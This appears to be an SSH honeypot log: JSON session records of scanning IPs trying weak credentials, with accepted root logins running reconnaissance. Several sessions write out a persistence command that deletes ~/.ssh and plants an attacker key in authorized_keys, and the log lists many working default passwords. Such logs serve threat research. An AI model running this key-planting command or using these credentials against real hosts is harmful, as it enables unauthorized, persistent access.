Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: esuser
{
"id": "564881919e7d",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:58:03.808422Z",
"end_time": "2026-05-17T22:58:05.609945Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "0a07365cc01fa9fc82608ba4019af499",
"attempts": [
{
"user": "esuser",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / password
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "f166169afa55",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:57:59.869751Z",
"end_time": "2026-05-17T22:58:01.158205Z",
"duration": "1.3",
"version": "SSH-2.0-Go",
"hassh": "0a07365cc01fa9fc82608ba4019af499",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "password"
},
"commands": [
"uname -s -v -n -r -m"
],
"detailed_commands": [
{
"cmd": "uname -s -v -n -r -m",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 100,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN",
"RECONNAISSANCE"
]
}Credential acceptance event recorded. Target authentication: root / 1qaz@WSX3edc
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "6bf8d98834d2",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:57:56.063198Z",
"end_time": "2026-05-17T22:57:57.573842Z",
"duration": "1.5",
"version": "SSH-2.0-Go",
"hassh": "0a07365cc01fa9fc82608ba4019af499",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "1qaz@WSX3edc"
},
"commands": [
"uname -s -v -n -r -m"
],
"detailed_commands": [
{
"cmd": "uname -s -v -n -r -m",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 100,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN",
"RECONNAISSANCE"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: ams
{
"id": "8b465c768289",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:57:52.526206Z",
"end_time": "2026-05-17T22:57:54.335212Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "0a07365cc01fa9fc82608ba4019af499",
"attempts": [
{
"user": "ams",
"pass": "ams"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: palworld
{
"id": "1a514cc33afc",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:57:48.768084Z",
"end_time": "2026-05-17T22:57:50.738745Z",
"duration": "2.0",
"version": "SSH-2.0-Go",
"hassh": "0a07365cc01fa9fc82608ba4019af499",
"attempts": [
{
"user": "palworld",
"pass": "palworld"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: dmdba
{
"id": "99a7e71c5c5d",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:57:45.028043Z",
"end_time": "2026-05-17T22:57:46.941321Z",
"duration": "1.9",
"version": "SSH-2.0-Go",
"hassh": "0a07365cc01fa9fc82608ba4019af499",
"attempts": [
{
"user": "dmdba",
"pass": "dmdba"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: jamalihassab
{
"id": "918826790554",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:57:41.411111Z",
"end_time": "2026-05-17T22:57:43.317936Z",
"duration": "1.9",
"version": "SSH-2.0-Go",
"hassh": "0a07365cc01fa9fc82608ba4019af499",
"attempts": [
{
"user": "jamalihassab",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 1Q2W3E4R
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "db2c3622a04d",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:57:37.560789Z",
"end_time": "2026-05-17T22:57:38.905474Z",
"duration": "1.3",
"version": "SSH-2.0-Go",
"hassh": "0a07365cc01fa9fc82608ba4019af499",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "1Q2W3E4R"
},
"commands": [
"uname -s -v -n -r -m"
],
"detailed_commands": [
{
"cmd": "uname -s -v -n -r -m",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 100,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN",
"RECONNAISSANCE"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: bitrix
{
"id": "197c0d03fe99",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:57:33.921526Z",
"end_time": "2026-05-17T22:57:36.018270Z",
"duration": "2.1",
"version": "SSH-2.0-Go",
"hassh": "0a07365cc01fa9fc82608ba4019af499",
"attempts": [
{
"user": "bitrix",
"pass": "bitrix"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / linux
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "9b0bbc51183c",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:57:29.967285Z",
"end_time": "2026-05-17T22:57:31.547010Z",
"duration": "1.6",
"version": "SSH-2.0-Go",
"hassh": "0a07365cc01fa9fc82608ba4019af499",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "linux"
},
"commands": [
"uname -s -v -n -r -m"
],
"detailed_commands": [
{
"cmd": "uname -s -v -n -r -m",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 100,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN",
"RECONNAISSANCE"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: hu
{
"id": "fe73427d4999",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:57:26.161917Z",
"end_time": "2026-05-17T22:57:28.040537Z",
"duration": "1.9",
"version": "SSH-2.0-Go",
"hassh": "0a07365cc01fa9fc82608ba4019af499",
"attempts": [
{
"user": "hu",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: user1
{
"id": "c77f18702514",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:57:22.281317Z",
"end_time": "2026-05-17T22:57:24.396367Z",
"duration": "2.1",
"version": "SSH-2.0-Go",
"hassh": "0a07365cc01fa9fc82608ba4019af499",
"attempts": [
{
"user": "user1",
"pass": "12345"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: deploy
{
"id": "068dbaf2966c",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:57:17.943189Z",
"end_time": "2026-05-17T22:57:19.996340Z",
"duration": "2.1",
"version": "SSH-2.0-Go",
"hassh": "0a07365cc01fa9fc82608ba4019af499",
"attempts": [
{
"user": "deploy",
"pass": "1234"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Root@123
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "73bb4326e2c6",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:57:14.162269Z",
"end_time": "2026-05-17T22:57:15.423852Z",
"duration": "1.3",
"version": "SSH-2.0-Go",
"hassh": "0a07365cc01fa9fc82608ba4019af499",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Root@123"
},
"commands": [
"uname -s -v -n -r -m"
],
"detailed_commands": [
{
"cmd": "uname -s -v -n -r -m",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 100,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN",
"RECONNAISSANCE"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "43068839bfa2",
"src_ip": "45.156.87.204",
"start_time": "2026-05-17T22:56:01.392398Z",
"end_time": "2026-05-17T22:56:09.392565Z",
"duration": "8.0",
"version": "SSH-2.0-Go",
"hassh": "084386fa7ae5039bcf6f07298a05a227",
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: ubnt
{
"id": "74ce42a4f58f",
"src_ip": "111.17.213.162",
"start_time": "2026-05-17T22:49:25.798848Z",
"end_time": "2026-05-17T22:49:30.317972Z",
"duration": "4.5",
"version": "SSH-2.0-OpenSSH_7.4",
"hassh": "acaa53e0a7d7ac7d1255103f37901306",
"attempts": [
{
"user": "ubnt",
"pass": "8888"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "08a538fcd4ec",
"src_ip": "222.208.64.40",
"start_time": "2026-05-17T22:41:33.571923Z",
"end_time": "2026-05-17T22:43:33.637599Z",
"duration": "120.1",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: support
{
"id": "d0b54f2f382e",
"src_ip": "87.251.64.176",
"start_time": "2026-05-17T22:40:32.259961Z",
"end_time": "2026-05-17T22:40:34.150273Z",
"duration": "1.9",
"version": "SSH-2.0-Go",
"hassh": "eff4c24daffc8532c160e86e5f006e53",
"attempts": [
{
"user": "support",
"pass": "support"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "a7af193e4c41",
"src_ip": "14.103.127.233",
"start_time": "2026-05-17T22:40:00.061685Z",
"end_time": "2026-05-17T22:42:00.093027Z",
"duration": "120.0",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: centos
{
"id": "dbfafb5f5e7a",
"src_ip": "71.229.1.186",
"start_time": "2026-05-17T22:33:43.145267Z",
"end_time": "2026-05-17T22:33:46.344535Z",
"duration": "3.2",
"version": "SSH-2.0-OpenSSH_7.4",
"hassh": "acaa53e0a7d7ac7d1255103f37901306",
"attempts": [
{
"user": "centos",
"pass": "1234567890"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "3b1a1cbab211",
"src_ip": "192.168.0.1",
"start_time": "2026-05-17T22:30:24.055680Z",
"end_time": "2026-05-17T22:30:24.067067Z",
"duration": "0.0",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Unauthorized authentication attempt escalated. Dictionary traversal detected (5 distinct queries). Vector identities: user
{
"id": "14eb020da134",
"src_ip": "193.46.255.86",
"start_time": "2026-05-17T22:28:53.162037Z",
"end_time": "2026-05-17T22:29:00.245067Z",
"duration": "7.1",
"version": "SSH-2.0-PuTTY_Release_0.83",
"hassh": "57446c12547a668110aa237e5965e374",
"attempts": [
{
"user": "user",
"pass": "user"
},
{
"user": "user",
"pass": "1234"
},
{
"user": "user",
"pass": "password"
},
{
"user": "user",
"pass": "admin"
},
{
"user": "user",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "37153c96976d",
"src_ip": "156.245.207.80",
"start_time": "2026-05-17T22:25:34.288507Z",
"end_time": "2026-05-17T22:27:34.308866Z",
"duration": "120.0",
"version": "SSH-2.0-libssh2_1.11.1",
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: admin
{
"id": "f4c379288322",
"src_ip": "156.245.207.80",
"start_time": "2026-05-17T22:24:56.163565Z",
"end_time": "2026-05-17T22:25:04.079095Z",
"duration": "7.9",
"version": "SSH-2.0-libssh2_1.11.1",
"hassh": "19532158b559096b89b1a5f7d17175b2",
"attempts": [
{
"user": "admin",
"pass": "admin"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Password01
{
"id": "b2d0b667bf68",
"src_ip": "61.80.158.202",
"start_time": "2026-05-17T22:20:19.869885Z",
"end_time": "2026-05-17T22:20:28.967844Z",
"duration": "9.1",
"version": "SSH-2.0-OpenSSH_7.4",
"hassh": "acaa53e0a7d7ac7d1255103f37901306",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Password01"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Password01
{
"id": "533001e0aca9",
"src_ip": "14.99.61.248",
"start_time": "2026-05-17T22:20:06.023395Z",
"end_time": "2026-05-17T22:20:14.512147Z",
"duration": "8.5",
"version": "SSH-2.0-OpenSSH_7.4",
"hassh": "acaa53e0a7d7ac7d1255103f37901306",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Password01"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "88cf4e30419c",
"src_ip": "205.210.31.158",
"start_time": "2026-05-17T22:19:34.965507Z",
"end_time": "2026-05-17T22:19:38.355542Z",
"duration": "3.4",
"version": "SSH-2.0-ZGrab ZGrab SSH Survey",
"hassh": "dd9bcf093c355da7000132131cb36fd0",
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "23b82fd28016",
"src_ip": "193.254.135.252",
"start_time": "2026-05-17T22:19:33.597594Z",
"end_time": "2026-05-17T22:19:34.583174Z",
"duration": "1.0",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "ed9ca1cf8d7d",
"src_ip": "193.254.135.252",
"start_time": "2026-05-17T22:19:31.462615Z",
"end_time": "2026-05-17T22:19:33.444007Z",
"duration": "2.0",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / thiago
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "b98dd026b0bf",
"src_ip": "193.254.135.252",
"start_time": "2026-05-17T22:19:29.404868Z",
"end_time": "2026-05-17T22:19:34.580176Z",
"duration": "5.2",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "thiago"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "ed55b26e246b",
"src_ip": "43.134.56.214",
"start_time": "2026-05-17T22:19:12.209672Z",
"end_time": "2026-05-17T22:19:13.339749Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "e0e4f370b378",
"src_ip": "43.134.56.214",
"start_time": "2026-05-17T22:19:09.910177Z",
"end_time": "2026-05-17T22:19:12.032116Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 147258369
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "1f2f897d68b8",
"src_ip": "43.134.56.214",
"start_time": "2026-05-17T22:19:07.557197Z",
"end_time": "2026-05-17T22:19:13.336786Z",
"duration": "5.8",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "147258369"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "e41704212c62",
"src_ip": "43.153.12.158",
"start_time": "2026-05-17T22:18:11.495759Z",
"end_time": "2026-05-17T22:18:11.686636Z",
"duration": "0.2",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "0e9151463bed",
"src_ip": "43.153.12.158",
"start_time": "2026-05-17T22:18:10.285672Z",
"end_time": "2026-05-17T22:18:11.474287Z",
"duration": "1.2",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 789456123
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "918b578ba77f",
"src_ip": "43.153.12.158",
"start_time": "2026-05-17T22:18:09.828420Z",
"end_time": "2026-05-17T22:18:11.683779Z",
"duration": "1.9",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "789456123"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "7571638a61d8",
"src_ip": "43.156.97.164",
"start_time": "2026-05-17T22:17:35.849483Z",
"end_time": "2026-05-17T22:17:36.978731Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "d0ad30645a53",
"src_ip": "43.156.97.164",
"start_time": "2026-05-17T22:17:33.545143Z",
"end_time": "2026-05-17T22:17:35.671075Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / abc@123
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "032eb7a3a0a6",
"src_ip": "43.156.97.164",
"start_time": "2026-05-17T22:17:31.176545Z",
"end_time": "2026-05-17T22:17:36.975874Z",
"duration": "5.8",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "abc@123"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
